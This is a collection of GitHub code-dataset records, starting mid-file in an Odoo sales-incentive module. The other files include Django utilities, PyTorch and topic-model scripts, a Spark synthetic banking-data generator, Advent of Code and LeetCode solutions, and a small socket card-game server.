compose_form_id = False\n        lang = self.env.context.get('lang')\n        template = template_id and self.env['mail.template'].browse(template_id)\n        if template and template.lang:\n            lang = template._render_template(template.lang, 'sale.incentive', self.ids[0])\n        ctx = {\n            'default_model': 'sale.incentive',\n            'default_res_id': self.ids[0],\n            'default_use_template': bool(template_id),\n            'default_template_id': template_id,\n            'default_composition_mode': 'comment',\n            'mark_so_as_sent': True,\n            'model_description': self.with_context(lang=lang)._description,\n            'custom_layout': \"mail.mail_notification_paynow\",\n            'proforma': self.env.context.get('proforma', False),\n            'force_email': True\n        }\n        return {\n            'type': 'ir.actions.act_window',\n            'view_type': 'form',\n            'view_mode': 'form',\n            'res_model': 'mail.compose.message',\n            'views': [(compose_form_id, 'form')],\n            'view_id': compose_form_id,\n            'target': 'new',\n            'context': ctx,\n        }\n\n    @api.multi\n    @api.returns('mail.message', lambda value: value.id)\n    def message_post(self, **kwargs):\n        if self.env.context.get('mark_so_as_sent'):\n            self.filtered(lambda o: o.state == 'draft').with_context(tracking_disable=True).write({'state': 'incentive_sent'})\n            self.env.user.company_id.set_onboarding_step_done('sale_onboarding_sample_quotation_state')\n        return super(SaleIncentive, self.with_context(mail_post_autofollow=True)).message_post(**kwargs)\n\n    @api.model\n    def create(self, vals):\n        if vals.get('name', 'New') == 'New':\n            vals['name'] = self.env['ir.sequence'].next_by_code(\n                'sale.incentive') or 'New'\n        result = super(SaleIncentive, self).create(vals)\n        return result\n\nclass BrandObjectives(models.Model):\n    _name = \"brand.objectives\"\n    _description = \"Brand Objectives\"\n\n    sale_incentive_id = fields.Many2one('sale.incentive', string='Sale Incentive')\n    no_brand_objetive = fields.Char(string=\"N° Brands with Objectives\")\n    brand = fields.Many2one('brand.code', string=\"Brand\") # Brand\n    code = fields.Char(string=\"Code\") # Code\n    description = fields.Char(string=\"Description\")\n    cupor_for_boxes = fields.Float(string=\"Cupo in boxes\") # Quota in boxes\n    space_in_bs = fields.Float(string=\"Cupo in Bs\") # Quota in Bs\n    sale_by_box = fields.Float(string=\"Sale by Boxes\") # Sale in boxes\n    sale_in_bs = fields.Float(string=\"Sale in Bs\") # Sale in Bs\n    achievement_in_box = fields.Float(string=\"% Achievement in Boxes\", compute='_compute_achievement_in_box') # Achievement in boxes\n    tobe_charged_for_box = fields.Float(string=\"To be charged for boxes\", compute='_compute_tobe_charged_for_box') # To be charged per box\n    charged_for_box = fields.Float(string=\"Charge for boxes\", compute='_compute_charged_for_box') # Charged per box\n\n\n    @api.onchange('brand')\n    def onchange_brand(self):\n        for rec in self:\n            if rec.brand:\n                rec.code = rec.brand.code\n                rec.no_brand_objetive = str(rec.sale_incentive_id.brands_objective)\n\n    @api.depends('sale_by_box','cupor_for_boxes')\n    def _compute_achievement_in_box(self):\n        for rec in self:\n            if rec.cupor_for_boxes > 0:\n                rec.achievement_in_box = rec.sale_by_box / rec.cupor_for_boxes\n        \n\n    @api.depends('achievement_in_box')\n    def _compute_tobe_charged_for_box(self):\n        for rec in self:\n            rec.tobe_charged_for_box = rec.achievement_in_box\n\n    @api.depends('sale_incentive_id','tobe_charged_for_box')\n    def _compute_charged_for_box(self):\n        for rec in self:\n            rec.charged_for_box = rec.tobe_charged_for_box * rec.sale_incentive_id.bonus_brand_boxes\n\nclass BrandCode(models.Model):\n    _name = \"brand.code\"\n    _rec_name = 'brand'\n    _sql_constraints = [\n        ('name_uniq',\n         'UNIQUE (brand)',\n         'Brand name must be unique.')\n    ]\n\n    code = fields.Char(string=\"Code\")\n    brand = fields.Char(string=\"Brand\") # Brand\n\n\nclass Region(models.Model):\n    _name = \"region.incentive\"\n    _rec_name = 'name'\n\n    code = fields.Char(string=\"Code\")\n    name = fields.Char(string=\"Region\")\n","repo_name":"aaparicio87/Odoo12","sub_path":"Dorta/sales_modification/models/sale_incentive.py","file_name":"sale_incentive.py","file_ext":"py","file_size_in_byte":13901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"25569476797","text":"from overwork.models import Person, Overs\nfrom django.contrib.auth.models import User\n\nall = Person.objects.all()\nallusers = User.objects.all()\nfor x in all:\n    print(x, 'deleted')\n    x.delete()\n\nfor x in allusers:\n    print(x, 'deleted')\n    x.delete()\n\nfor x in Overs.objects.all():\n    x.delete()\n","repo_name":"anokata/comleave","sub_path":"scripts/deleteall.py","file_name":"deleteall.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"31837192940","text":"import os\nfrom tqdm import tqdm\nimport torch\nimport numpy as np\nimport dataset\nfrom generator import Generator\nfrom encoder_net import EncoderNet\nfrom torch.utils.data import DataLoader\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom utils.visualizer import save_image\nfrom models.perceptual_model import VGG16\nfrom signal import signal, SIGINT\nimport sys\n\n\ndef main():\n    encoder = EncoderNet().to('cuda')\n    imgTrainDataset = dataset.WPlusGeneratingDataset()\n    dataloader = DataLoader(imgTrainDataset,\n                            batch_size=4,\n                            shuffle=True,\n                            num_workers=0,\n                            pin_memory=True)\n    optimizer = optim.AdamW(encoder.parameters())\n\n    num_epochs = 30\n    feat_lambda = 1.0\n\n    def intHandler(sigNum, frame):\n        weight_name = 'encoder_weights_pretrain_test.pth'\n        save_weights = input(\"\\nsave weights? 
y/[n]:\")\n if save_weights == 'y':\n torch.save(encoder.state_dict(), weight_name)\n print(f\"saved weights to {weight_name}\")\n exit(0)\n signal(SIGINT, intHandler)\n\n def compute_loss(wps, imgs):\n wps = wps.to('cuda')\n imgs = imgs.to('cuda')\n enc_wps = encoder(imgs).view(-1, 14, 512)\n loss = F.mse_loss(wps, enc_wps, \n reduction='mean')\n return loss\n\n def train_loop():\n losshist = np.zeros(len(dataloader))\n for i, data in enumerate(tqdm(dataloader)):\n wps, imgs = data\n optimizer.zero_grad()\n loss = compute_loss(wps, imgs)\n loss.backward()\n optimizer.step()\n losshist[i] = loss.cpu().detach().numpy()\n return np.mean(losshist)\n\n for epoch in range(15):\n loss = train_loop()\n print(f'{epoch}: loss={loss}')\n\n optimizer = optim.SGD(encoder.parameters(),\n lr=0.0001, momentum=0.9)\n scheduler = optim.lr_scheduler.StepLR(optimizer, \n step_size=15, \n gamma=0.1)\n\n for epoch in range(num_epochs):\n loss = train_loop()\n print(f'{epoch+15}: loss={loss}')\n scheduler.step()\n\n torch.save(encoder.state_dict(), 'encoder_weights_pretrain2.pth')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"msrasheed/stylegan-inversion","sub_path":"pretrain.py","file_name":"pretrain.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35650811406","text":"import numpy as np\nimport pandas as pd\nfrom numpy import log as ln\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom tqdm.auto import tqdm\n\n\ndef extract_document_term_matrix(traintexts, used_vocabs, test=False, vect=None):\n if not test:\n vect = CountVectorizer()\n vect.fit(used_vocabs)\n\n vects = vect.transform(traintexts)\n\n document_term_matrix = pd.DataFrame(vects.todense())\n\n document_term_matrix.columns = vect.get_feature_names_out()\n if len(used_vocabs) != len(document_term_matrix.columns) and 0 < len(used_vocabs) - len(\n document_term_matrix.columns) <= 5:\n remaining = [w for w in used_vocabs if w not in document_term_matrix.columns]\n document_term_matrix[remaining] = 0\n document_term_matrix = document_term_matrix[used_vocabs]\n print(\"document_term created\")\n\n return document_term_matrix, vect\n\n\ndef extract_topic_term_matrix_tp(model):\n data_topic_words = [model.get_topic_word_dist(topic_id) for topic_id in range(model.k)]\n topic_term_matrix = pd.DataFrame(data_topic_words)\n topic_term_matrix.columns = model.used_vocabs\n print(\"topic_term created\")\n return topic_term_matrix\n\n\ndef extract_document_topic_matrix_tp(model, train=True, data_words_test=None):\n list_infers_train = []\n\n if train:\n for doc_idx in range(len(model.docs)):\n list_infers_train.append(model.infer(model.docs[doc_idx])[0])\n else:\n for doc in data_words_test:\n new_d = model.make_doc(doc)\n list_infers_train.append(model.infer(new_d)[0])\n\n document_topic_matrix = pd.DataFrame(list_infers_train)\n document_topic_matrix.columns = [\"topic\" + str(topic_id) for topic_id in range(model.k)]\n print(\"document_topic created\")\n\n return document_topic_matrix\n\n\ndef perplexity(document_term_matrix, document_topic_matrix, topic_term_matrix):\n ll = 0\n for row_idx in tqdm(range(len(document_term_matrix)), leave=False):\n used_words_in_doc = [document_term_matrix.columns[i] for i in\n np.where(document_term_matrix.iloc[row_idx] > 0)[0]]\n document_topic_doc = document_topic_matrix.to_numpy()[row_idx].reshape(1, -1)\n topic_term_doc = topic_term_matrix[used_words_in_doc]\n dotprod = 
np.matmul(document_topic_doc, topic_term_doc)\n        logprod = np.matmul(ln(dotprod + 1e-16),\n                            document_term_matrix.iloc[row_idx][used_words_in_doc].to_numpy().reshape(-1, 1))\n\n        ll += logprod\n\n    ll = ll.values[0][0]\n    perplexity_value = np.exp(-ll / sum(sum(document_term_matrix.values)))\n\n    return perplexity_value, - ll / sum(sum(document_term_matrix.values))\n","repo_name":"matteoborrotti/automaticlabeling","sub_path":"code/custom_libraries/perplexityUtilities.py","file_name":"perplexityUtilities.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"3248677154","text":"# -*- coding: utf-8 -*-\r\n\r\n#from django.template import RequestContext\r\nfrom django.contrib.auth.decorators import login_required\r\n#from django.shortcuts import render_to_response\r\n\r\nfrom weixin2 import export\r\nfrom core.exceptionutil import unicode_full_stack\r\nfrom core import resource\r\nfrom core.jsonresponse import create_response\r\nfrom weixin2.models import FanCategory,FanHasCategory\r\nfrom modules.member.models import *\r\n#from .util import get_members\r\n\r\nfrom fans_category import DEFAULT_CATEGORY_NAME\r\n\r\nclass FansInfo(resource.Resource):\r\n\t\"\"\"\r\n\tFan profile information\r\n\t\"\"\"\r\n\tapp = 'new_weixin'\r\n\tresource = 'fans_info'\r\n\r\n\t@staticmethod\r\n\tdef check_params(request):\r\n\t\tis_valid = True\r\n\t\tresponse = None\r\n\t\tif not 'id' in request.GET:\r\n\t\t\tis_valid = False\r\n\t\t\tresponse = create_response(500)\r\n\t\t\tresponse.errMsg = \"missing parameter: id\"\r\n\t\treturn (is_valid, response)\r\n\r\n\t@login_required\r\n\tdef api_get(request):\r\n\t\t\"\"\"\r\n\t\tGet the profile information of a fan (member)\r\n\r\n\t\t~~~~~~~~~~{.c}\r\n\t\tinfo = {\r\n\t\t\t\"nickname\": u\"nickname\",\r\n\t\t\t\"remark\": u\"remark\",\r\n\t\t\t\"location\": u\"Beijing\",\r\n\t\t\t\"signature\": u\"signature\",\r\n\t\t\t\"category\": u\"ungrouped\",\r\n\t\t}\r\n\t\t~~~~~~~~~~\r\n\t\t\"\"\"\r\n\r\n\t\t#assert 'id' in request.GET\r\n\t\t(is_valid, response) = FansInfo.check_params(request)\r\n\r\n\t\tif is_valid:\r\n\t\t\tfan_id = request.GET.get('id')\r\n\t\t\tresponse = create_response(200)\r\n\r\n\t\t\t# Fetch the fan (member) information\r\n\t\t\ttry:\r\n\t\t\t\tsocial_member = Member.objects.get(id=fan_id)\r\n\t\t\t\tsocial_member_info = MemberInfo.objects.get(member=social_member)\r\n\t\t\t\r\n\t\t\t\tcategories = FanHasCategory.objects.filter(fan_id=fan_id)\r\n\t\t\t\tif len(categories)>0:\r\n\t\t\t\t\tcategory_name = categories[0].category.name\r\n\t\t\t\t\tcategory_id = categories[0].category.id\r\n\t\t\t\telse:\r\n\t\t\t\t\tcategory_name = DEFAULT_CATEGORY_NAME\r\n\t\t\t\t\tcategory_id = -1\r\n\t\t\t\t\r\n\t\t\t\taddress = \"%s %s %s\" % (social_member.country, social_member.province, social_member.city) \r\n\t\t\t\tinfo = {\r\n\t\t\t\t\t'nickname': social_member.username_for_html,\r\n\t\t\t\t\t'remark': social_member_info.name,\r\n\t\t\t\t\t'location': address,\r\n\t\t\t\t\t'signature': '', # where to get?\r\n\t\t\t\t\t'category': category_name,\r\n\t\t\t\t\t'category_id': category_id,\r\n\t\t\t\t}\r\n\t\t\t\tresponse.data = {\r\n\t\t\t\t\t'info': info\r\n\t\t\t\t}\r\n\t\t\texcept Member.DoesNotExist:\r\n\t\t\t\tresponse = create_response(501)\r\n\t\t\t\tresponse.errMsg = u'invalid id'\r\n\t\t\t\t#response.innerErrMsg = unicode_full_stack()\r\n\t\t\texcept MemberInfo.DoesNotExist:\r\n\t\t\t\tresponse = create_response(502)\r\n\t\t\t\tresponse.errMsg = u'no valid user information'\r\n\t\t\texcept:\r\n\t\t\t\tresponse = create_response(500)\r\n\t\t\t\tresponse.errMsg = u'failed to fetch fan details (e.g. invalid ID)'\r\n\t\t\t\tresponse.innerErrMsg = unicode_full_stack()\r\n\t\treturn response.get_response()\r\n","repo_name":"chengdg/weizoom","sub_path":"weapp/weixin2/advance_manage/fans_info.py","file_name":"fans_info.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"70893115433","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\nfrom pyspark.sql.types import LongType, IntegerType, StringType\nimport dbldatagen as dg\nimport dbldatagen.distributions as dist\nfrom dbldatagen import FakerTextFactory, DataGenerator, fakerText\nfrom faker.providers import bank, credit_card, currency\nimport cml.data_v1 as cmldata\n\n\nclass BankDataGen:\n\n    '''Class to Generate Banking Data'''\n\n    def __init__(self, spark, username):\n        self.spark = spark\n        self.username = username\n\n    def bankDataGen(self, shuffle_partitions_requested = 8, partitions_requested = 8, data_rows = 10000):\n\n        # setup use of Faker\n        FakerTextUS = FakerTextFactory(locale=['en_US'], providers=[bank])\n\n        # partition parameters etc.\n        self.spark.conf.set(\"spark.sql.shuffle.partitions\", shuffle_partitions_requested)\n\n        fakerDataspec = (DataGenerator(self.spark, rows=data_rows, partitions=partitions_requested)\n                    .withColumn(\"name\", percentNulls=0.1, text=FakerTextUS(\"name\") )\n                    .withColumn(\"address\", text=FakerTextUS(\"address\" ))\n                    .withColumn(\"email\", text=FakerTextUS(\"ascii_company_email\") )\n                    .withColumn(\"age\", \"decimal\", minValue=10, maxValue=100, random=True)\n                    .withColumn(\"credit_card_balance\", \"decimal\", minValue=100, maxValue=30000, random=True)\n                    .withColumn(\"bank_account_balance\", \"decimal\", minValue=0.01, maxValue=100000, random=True)\n                    .withColumn(\"mortgage_balance\", \"decimal\", minValue=0.01, maxValue=1000000, random=True)\n                    .withColumn(\"sec_bank_account_balance\", \"decimal\", minValue=0.01, maxValue=100000, random=True)\n                    .withColumn(\"savings_account_balance\", \"decimal\", minValue=0.01, maxValue=500000, random=True)\n                    .withColumn(\"sec_savings_account_balance\", \"decimal\", minValue=0.01, maxValue=500000, random=True)\n                    .withColumn(\"total_est_nworth\", \"decimal\", minValue=10000, maxValue=500000, random=True)\n                    .withColumn(\"primary_loan_balance\", \"decimal\", minValue=0.01, maxValue=5000, random=True)\n                    .withColumn(\"secondary_loan_balance\", \"decimal\", minValue=0.01, maxValue=500000, random=True)\n                    .withColumn(\"college_loan_balance\", \"decimal\", minValue=0.01, maxValue=10000, random=True)\n                    .withColumn(\"aba_routing\", text=FakerTextUS(\"aba\" ))\n                    .withColumn(\"bank_country\", text=FakerTextUS(\"bank_country\") )\n                    .withColumn(\"account_no\", text=FakerTextUS(\"bban\" ))\n                    .withColumn(\"int_account_no\", text=FakerTextUS(\"iban\") )\n                    .withColumn(\"swift11\", text=FakerTextUS(\"swift11\" ))\n                    .withColumn(\"credit_card_number\", text=FakerTextUS(\"credit_card_number\") )\n                    .withColumn(\"credit_card_provider\", text=FakerTextUS(\"credit_card_provider\") )\n                    .withColumn(\"event_type\", \"string\", values=[\"purchase\", \"cash_advance\"],random=True)\n                    .withColumn(\"longitude\", \"float\", minValue=-180, maxValue=180, random=True)\n                    .withColumn(\"latitude\", \"float\", minValue=-90, maxValue=90, random=True)\n                    .withColumn(\"transaction_currency\", values=[\"USD\", \"EUR\", \"KWD\", \"BHD\", \"GBP\", \"CHF\", \"MEX\"])\n                    .withColumn(\"transaction_amount\", \"decimal\", minValue=0.01, maxValue=30000, random=True)\n                     
.withColumn(\"fraud\", values=[\"YES\", \"NO\"], random=True, weights=[9, 1])\n )\n df = fakerDataspec.build()\n\n return df\n\n\n# Sample in-code customization of spark configurations\nfrom pyspark import SparkContext\nSparkContext.setSystemProperty('spark.executor.cores', '2')\nSparkContext.setSystemProperty('spark.executor.memory', '4g')\n\nCONNECTION_NAME = \"go01-aw-dl\"\nconn = cmldata.get_connection(CONNECTION_NAME)\nspark = conn.get_spark_session()\nusername = os.environ[\"PROJECT_OWNER\"]\ndbname = \"MLOPS\"\n\n#---------------------------------------------------\n# SQL CLEANUP: DATABASES, TABLES, VIEWS\n#---------------------------------------------------\nprint(\"JOB STARTED...\")\n#spark.sql(\"DROP DATABASE IF EXISTS {} CASCADE\".format(dbname))\n\nspark.sql(\"CREATE DATABASE IF NOT EXISTS {}\".format(dbname))\n\nprint(\"SHOW DATABASES LIKE '{}'\".format(dbname))\nspark.sql(\"SHOW DATABASES LIKE '{}'\".format(dbname)).show()\nprint(\"\\n\")\n\n#---------------------------------------------------\n# CREATE BATCH DATA\n#---------------------------------------------------\n\nprint(\"CREATING BANKING TRANSACTIONS\\n\")\n\ndg = BankDataGen(spark, username)\n\nbankTransactionsDf = dg.bankDataGen()\n\ndef createOrAppend(df, dbname, username):\n \"\"\"\n Method to create or append data to the BANKING TRANSACTIONS table\n The table is used to simulate batches of new data\n The table is meant to be updated periodically as part of a CML Job\n \"\"\"\n \n try:\n print(\"TRY TO APPEND NEW BATCH OF DATA\\n\")\n df.writeTo(\"{0}.BANKING_TRANSACTIONS_{1}\".format(dbname, username))\\\n .using(\"iceberg\").tableProperty(\"write.format.default\", \"parquet\").append()\n print(\"TABLE WAS FOUND AND DATA WAS APPENDED\\n\")\n \n except:\n print(\"TABLE WAS NOT FOUND\\n\")\n print(\"CREATING TABLE NOW\\n\")\n df.writeTo(\"{0}.BANKING_TRANSACTIONS_{1}\".format(dbname, username))\\\n .using(\"iceberg\").tableProperty(\"write.format.default\", \"parquet\").createOrReplace()\n print(\"TABLE CREATED AND POPULATED WITH DATA\\n\")\n \ncreateOrAppend(bankTransactionsDf, dbname, username)\n \nprint(\"BATCH LOAD JOB COMPLETED\\n\")\n","repo_name":"pdefusco/MLOps_CML_DEV_Proj","sub_path":"0_data_gen.py","file_name":"0_data_gen.py","file_ext":"py","file_size_in_byte":5650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33447504952","text":"from copy import deepcopy\nfrom utils import read_file\n\npart_1_crates = {\n 1: ['L', 'C', 'G', 'M', 'Q'],\n 2: ['G', 'H', 'F', 'T', 'C', 'L', 'D', 'R'],\n 3: ['R', 'W', 'T', 'M', 'N', 'F', 'J', 'V'],\n 4: ['P', 'Q', 'V', 'D', 'F', 'J'],\n 5: ['T', 'B', 'L', 'S', 'M', 'F', 'N'],\n 6: ['P', 'D', 'C', 'H', 'V', 'N', 'R'],\n 7: ['T', 'C', 'H'],\n 8: ['P', 'H', 'N', 'Z', 'V', 'J', 'S', 'G'],\n 9: ['G', 'H', 'F', 'Z']\n}\n\npart1_test_crates = {\n 1: ['Z', 'N'],\n 2: ['M', 'C', 'D'],\n 3: ['P']\n}\n\npart_2_crates = deepcopy(part_1_crates)\npart2_test_crates = deepcopy(part1_test_crates)\n\n\ndef get_instructions():\n raw_data = read_file(\"./day5/day5-instructions-input.txt\")\n instructions = []\n for instruction in raw_data.splitlines():\n instructions.append([int(s) for s in instruction.split() if s.isdigit()])\n return instructions\n\n\ndef move_boxes_part1(q, s, d):\n for _ in range(q):\n part_1_crates[d].append(part_1_crates[s][-1])\n part_1_crates[s].pop()\n\n\ndef move_boxes_part2(q, s, d):\n part_2_crates[d].extend([part_2_crates[s].pop() for _ in range(q)][::-1])\n\n\ndef 
get_day5_results_for_first_part():\n    instructions = get_instructions()\n    for quantity, source, destination in instructions:\n        move_boxes_part1(quantity, source, destination)\n    result = \"\"\n    for i in part_1_crates:\n        result += part_1_crates[i][-1]\n    return result\n\n\ndef get_day5_results_for_second_part():\n    instructions = get_instructions()\n    for quantity, source, destination in instructions:\n        move_boxes_part2(quantity, source, destination)\n    result = \"\"\n    for i in part_2_crates:\n        result += part_2_crates[i][-1]\n    return result\n","repo_name":"NorbertRuff/AdventOfCodePython2022","sub_path":"day5/day5_resolver.py","file_name":"day5_resolver.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"29460225548","text":"import pandas\n\ndataset = pandas.read_csv(\"example.csv\")\n\ncolumns = dataset.columns\n\ncategoryType = columns[0]\nxType = columns[1]\nyType = columns[2]\n\ncategorySeries = dataset[categoryType]\nxSeries = dataset[xType]\nySeries = dataset[yType]\n\n\n\nxMin = xSeries.min()\nxMax = xSeries.max()\n\nxRange = abs(xMin)+abs(xMax)\n\n\nbuffer = int(xRange * .1)\n\n\nyAxisList = []\nmarker = xMin-buffer\nwhile marker < xMax:\n    yAxisList.append(marker)\n    marker += buffer\n\n\nfor item in yAxisList:\n    print(item)\n\nrawLine = yAxisList[0]+yAxisList[-1]","repo_name":"sanigak/PlottingWithoutMatplotlib","sub_path":"PlottingWithoutMatplotlib/ParsingMethods.py","file_name":"ParsingMethods.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"71003623592","text":"import cv2\nimport numpy as np\n\ndef draw_circle(event,x,y,flags,param):\n    if(event == cv2.EVENT_RBUTTONDOWN):\n        cv2.circle(img,(x,y),100,(255,0,0),thickness=10)\ncv2.namedWindow(winname = 'drawing')\ncv2.setMouseCallback('drawing',draw_circle)\n\nimg = cv2.imread('../DATA/dog_backpack.png')\n\nwhile True:\n    cv2.imshow('drawing',img)\n    if(cv2.waitKey(2) & 0xFF == 27):\n        break\ncv2.destroyAllWindows()","repo_name":"DimaMirana/UDEMY-Image-Processing-with-OpenCV-and-Python","sub_path":"image basics/rightClick.py","file_name":"rightClick.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"40798551431","text":"import sys\nfrom ting_file_management.file_management import txt_importer\n\n\ndef process(path_file, instance):\n    file_description = {\n        \"nome_do_arquivo\": path_file,\n        \"qtd_linhas\": len(txt_importer(path_file)),\n        \"linhas_do_arquivo\": txt_importer(path_file),\n    }\n\n    if file_description not in instance.queue:\n        instance.enqueue(file_description)\n\n    print(file_description, file=sys.stdout)\n\n\ndef remove(instance):\n    if not len(instance):\n        print(\"There are no elements\", file=sys.stdout)\n    else:\n        print(\n            \"File %s removed successfully\"\n            % (instance.dequeue()[\"nome_do_arquivo\"]),\n            file=sys.stdout,\n        )\n\n\ndef file_metadata(instance, position):\n    if position >= len(instance) or position < 0:\n        print(\"Invalid position\", file=sys.stderr)\n    else:\n        print(\"%s\" % (instance.search(position)), file=sys.stdout)\n","repo_name":"mpdsa/Cursos--Trybe--Computer_Science--T.I.N.G","sub_path":"ting_file_management/file_process.py","file_name":"file_process.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"16684194194","text":"import os\nfrom config import RunConfig\nimport logging\nimport click\nimport pytest\n\n# logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n# logger = logging.getLogger(__name__)\n\n@click.command()\n@click.option('-m', default=None, help='输入运行模式:run 或 debug.')\ndef run(m):\n if m is None or m == \"run\":\n #logger.info(\"回归模式,开始执行✈✈!\")\n pytest.main([\"-s\", \"-v\", RunConfig.cases_path,\n \"--maxfail\", RunConfig.max_fail,\n \"--reruns\", RunConfig.rerun])\n #logger.info(\"运行结束,生成测试报告♥❤!\")\n elif m == \"debug\":\n print(\"debug模式,开始执行!\")\n pytest.main([\"-v\", \"-s\", RunConfig.cases_path])\n print(\"运行结束!!\")\n\nif __name__ == '__main__':\n run()","repo_name":"keywong-github/repo44","sub_path":"my_pytest/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33769177746","text":"from matplotlib import pyplot as plt\nimport os\n\nfor d1 in os.listdir('Result'):\n for file in os.listdir('Result/'+d1):\n if file.endswith('stats'):\n x = []\n mean = []\n sd = []\n ci = []\n\n with open('Result/'+d1+'/'+file) as f:\n for line in f:\n line = line.strip()\n if line != '':\n line = line.split(',')\n x.append(int(line[0]))\n mean.append(float(line[1]))\n sd.append(float(line[2]))\n ci.append(float(line[4]))\n print(x,mean,sd,ci)\n\n plt.scatter(x, mean, label=\"Mean Plot\")\n # plt.plot(x, mean, '-ok')\n plt.xlabel('n')\n plt.ylabel('mean time(ms)')\n plt.legend()\n plt.savefig('Figures/' + d1 + '_mean.png')\n plt.clf()\n\n plt.scatter(x, sd, label=\"S.D. Plot\")\n # plt.plot(x, sd)\n plt.xlabel('n')\n plt.ylabel('std dev.')\n plt.legend()\n plt.savefig('Figures/' + d1 + '_sd.png')\n plt.clf()\n\n plt.scatter(x, ci, label=\"CI Plot\")\n # plt.plot(x, ci)\n plt.xlabel('n')\n plt.ylabel('margin of error for 95% CI')\n plt.legend()\n plt.savefig('Figures/' + d1 + '_ci.png')\n plt.clf()","repo_name":"suraj-iitb/algorithm-identification","sub_path":"Execution/Time/Statistics/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14454361832","text":"import os\nimport signal\nfrom threading import Thread\nimport socket\nimport protocol\nimport json\n\nIP = \"127.0.0.1\"\nPORT = 6123\n\ncard = []\nresult = []\nlimit = 7.5\n\n\nclass ClientThread(Thread):\n def __init__(self, client_socket, client_address):\n Thread.__init__(self)\n self.client_socket = client_socket\n self.client_address = client_address\n self.total = 0\n self.stop = False\n\n def manage_join(self):\n print(f\"[JOIN] {self.client_address} JOINED\")\n self.manage_answer()\n\n def random_number(self):\n import random\n random_num = random.randint(1, 10)\n card.append(random_num)\n return random_num\n\n def sum(self, num):\n\n if 1 <= num <= 7:\n num = num\n elif 8 <= num <= 10:\n num = 0.5\n\n self.total += num\n\n def manage_answer(self):\n end = False\n win = False\n try:\n num = self.random_number()\n self.sum(num)\n if self.total >= limit:\n end = True\n elif self.total == limit:\n win = True\n\n msg_envio = f\"[ANSWER] {self.client_address} answered add num: {num} and the sum is: {self.total}\"\n message = {'header': protocol.ANSWER, 'sum': msg_envio, 'end': end, 'win': win}\n protocol.send_one_message(self.client_socket, message)\n print(f\"[ANSWER] send to {self.client_address} \")\n\n except 
KeyError:\n raise protocol.InvalidProtocol\n\n def handle_message(self, message):\n try:\n message_header = message['header']\n if message_header == protocol.JOIN:\n self.manage_join()\n elif message_header == protocol.REQUEST:\n self.manage_answer()\n elif message_header == protocol.END:\n msg = {'header': protocol.END, 'sum': self.sum()}\n protocol.send_one_message(self.client_socket, msg)\n self.stop = True\n else:\n raise protocol.InvalidProtocol\n except KeyError:\n raise protocol.InvalidProtocol\n\n def run(self):\n print(f\"Connection received from {self.client_address}\")\n while not self.stop:\n try:\n message = protocol.recv_one_message(self.client_socket)\n self.handle_message(message)\n except protocol.InvalidProtocol as e:\n print(e)\n except protocol.ConnectionClosed:\n self.stop = True\n\n\nclass ServerSocketThread(Thread):\n def __init__(self):\n Thread.__init__(self)\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n self.server_socket.bind((IP, PORT))\n self.server_socket.listen()\n\n def run(self):\n ip, port = self.server_socket.getsockname()\n print(f\"Server listening on ({ip}, {port})...\")\n while True:\n client_socket, client_address = self.server_socket.accept()\n client_thread = ClientThread(client_socket, client_address)\n client_thread.start()\n\n\npid = os.getpid() # get the pid of the current process\nserver_socket_thread = ServerSocketThread()\nserver_socket_thread.start()\ntry:\n stop = False\n while not stop:\n command = input()\nexcept KeyboardInterrupt:\n print(\"Server stopped by admin\")\nos.kill(pid, signal.SIGTERM)\n\n\n\n","repo_name":"Mrtony94/Examen_L2_GIT","sub_path":"halfpastseven/tony_server.py","file_name":"tony_server.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28482278644","text":"# https://leetcode.com/problems/find-all-possible-recipes-from-given-supplies/\n\nclass Solution:\n def findAllRecipes(self, recipes: List[str], ingredients: List[List[str]], supplies: List[str]) -> List[str]:\n graph = defaultdict(list)\n requirements = defaultdict(int)\n q = deque(supplies)\n creatable = []\n\n for i, recipe in enumerate(recipes):\n for ing in ingredients[i]:\n graph[ing].append(recipe)\n requirements[recipe] = len(ingredients[i])\n\n while q:\n item = q.popleft()\n\n for rec in graph[item]:\n requirements[rec] -= 1\n if requirements[rec] == 0:\n q.append(rec)\n creatable.append(rec)\n\n return 